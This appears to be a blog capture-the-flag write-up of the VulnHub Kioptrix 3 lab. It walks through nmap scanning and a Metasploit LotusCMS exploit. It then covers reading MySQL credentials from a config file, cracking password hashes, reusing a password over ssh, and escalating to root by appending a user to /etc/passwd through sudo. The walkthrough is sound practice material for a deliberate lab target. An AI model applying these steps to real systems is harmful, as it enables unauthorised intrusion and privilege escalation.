CTF: Kioptrix 3
This is another OSCP like VulnHub that was very fun to do. I didn’t have any issues rooting this one and was able to do it rather quickly.
You will get practice with:
- mysql client
- file privilege escalation
I start off with an arp-scan to find the local machine… and it turns out that my box is 192.168.0.46. Let’s get this party started!
sudo arp-scan -l
A basic nmap scan returns a website and an ssh port. After the initial nmap scan I kick off a more thorough scan. It doesn’t tell me anything I didn’t learn some the initial scan.
# basic scan nmap 192.168.0.46 # deeper scan sudo nmap -p- -AO 192.168.0.46
The website looks like a simple CMS. On the login page, I can see that this is a LotusCMS. I immediately search online and see there is a Metasploit vulnerability.
Exploit with Metasploit
I start up Metasploit and use the search functionality to find a module.
# start metasploit msfconsole # once started search for "lotuscms" search lotuscms
# use module use exploit/multi/http/lcms_php_exec # show options show options # set options set RHOSTS 192.168.0.46 set URI / # exploit run
I personally prefer shell over merterpreter. It’s just more natural. I also like having the ability to clear the screen so I always set the terminal variable.
shell python -c "import pty; pty.spawn('/bin/bash')" export TERM=xterm
I immediately check the home directory to see who’s there. Then I check the /etc/passwd and take notes.
ls -la /home/ ls -la /home/dreg /home/loneferret /home/www
ALRIGHT! There’s a pretty big clue. “.sudo_as_admin_successful” means that loneferret can run something as root. That looks like the way up!
I looked around and I didn’t see much of anything that I could exploit. I didn’t see any misconfigured file permissions that I had access to… but I did see that mysql was running and was bound locally.
I ran checksec.sh just to see what it did.
MySQL is Running
I found MySQL running locally and the MySQL client was able to connect to it. Looks like I need to find some credentials to access the database.
I tried logging in as root to see if a password had not been set… but I wasn’t that lucky.
Exploring the LotusCMS Website
It’s fair to assume that if there is a Content Management System (CMS) running then there should be credentials to access some sort of database. MySQL is the most common database used with PHP applications. After digging around I found a gallery folder that contained a file “gconfig.php” This file was referenced in the index.php file and looked like a global configuration file.
OK! I now have root credentials for the MySQL server.
Time to move through the database and see what I can find.
# connect to mysql in bash mysql -u root -h 127.0.0.1 -p fuckeyou # once in mysql > show database; use gallery; show tables; describe dev_accounts; select *from dev_accounts;
I took those two md5 hashes and dropped them in CrackStation to get the passwords.
Turns out their passwords are:
dreg – Mas3r
loneferret – starwars
It’s very common for people to re-use their same passwords for logins elsewhere. While this appears to be passwords to the gallery page, it could also be a Linux user’s password. Turns out, loneferret’s password works for shell access.
ssh [email protected] starwars
I’m now in under the user, loneferret and I know this user has sudo access to an application.
So, I can run “ht” which is a terminal editor under root.
After messing around I was able to get a screen I could work on and I decided to use the same trick I used on HA: Albania and inject a user into the /etc/passwd file.
# append this to the /etc/passwd file in the ht editor hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash
Well, this just got easy… I really enjoyed this one.
su hax asdf
cd /root ls -la cat flag.txt